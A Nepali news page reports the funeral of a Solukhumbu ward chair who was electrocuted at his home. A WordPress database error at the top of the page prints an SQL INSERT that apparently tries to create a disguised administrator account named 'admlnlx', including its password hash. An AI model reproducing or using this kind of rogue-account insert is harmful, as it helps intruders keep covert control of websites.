WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZXkpQXKMwDJjnX1POUsOa6.Lpknk41', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 14:51:31', '', 'admlnlx', 'admlnlx')

वडा अध्यक्ष तमाङको अन्त्येष्टि, शव यात्रामा हजाँरौको सहभागिता – Gaule Khabar

वडा अध्यक्ष तमाङको अन्त्येष्टि, शव यात्रामा हजाँरौको सहभागिता

वडा अध्यक्ष तमाङको अन्त्येष्टि, शव यात्रामा हजाँरौको सहभागिता

सोलुखुम्बु । माप्यदुधकोशी गाउँपालिका ५ का वडा अध्यक्ष निमराज तामाङको आज अन्त्येष्टि गरिएको छ । मंगलबार सल्लेरीमा करेन्ट लागेर मृत्यु भएका वडा अध्यक्ष तामाङको बौद्ध धर्म अनुसार बुधबार अत्येष्टि गरिएकोे हो ।

तमाङको पार्थिव शरिरलाई माप्यदुधकोशी गाउँपालिका ५ र थुलुङ दुधकोशी गाउँपालिका ७ को सिमाना थोलेम डाँडामा अत्यष्टि गरिएको छ ।

शव यात्रा शुरु गर्नु अघि सल्लेरीमा नेकपा सोलुखुम्बुका सघिय सामसद हेमा कुमार राई, प्रदेश सामसद बुद्दिकुमार राजभण्डारी, उतम बस्न्तेत नेकपा जिल्ला अध्यक्ष मानविर राईले
सामुहिक रुपमा पार्टीको झण्डा ओडाएर सम्मान अर्पण गर्नुभएको थियो । सब यात्राामा नेकपा जिल्ला सचिब कर्ज्यङ शेर्पा, माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्दिकिरण राई, उपाध्यक्ष जुनिता मगर, नेपाली काङ्रेस जिल्ला सभापति बिनोद बस्नेत लगायत अन्य जनप्रतिनिधि, कर्मचारी लगायत विशिष्ट ब्याक्तिहरुले अन्तिम श्रद्धाञ्जली अर्पण गर्नुभएको थियो

सल्लेरीमा रहेको आफ्नै घरको छतमा मंगलबार रड लैजाने क्रममा करेन्ट लागेर उहाँको मृत्यु भएको थियो । ३९ बर्षिय तामाङ तत्कालिन नेकपा एमालेबाट वडा अध्यक्ष पदमा निर्वाचीत हुनुभएको थियो । उहाँको श्रीमति सहित एक छोरा र एक छोरी छन् ।

उहाँ नेपाल लेखापढी कानुन ब्यवसायी एसोसिएसन सोलुखुम्बका अध्यक्ष समेत हुनुहुन्थ्यो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका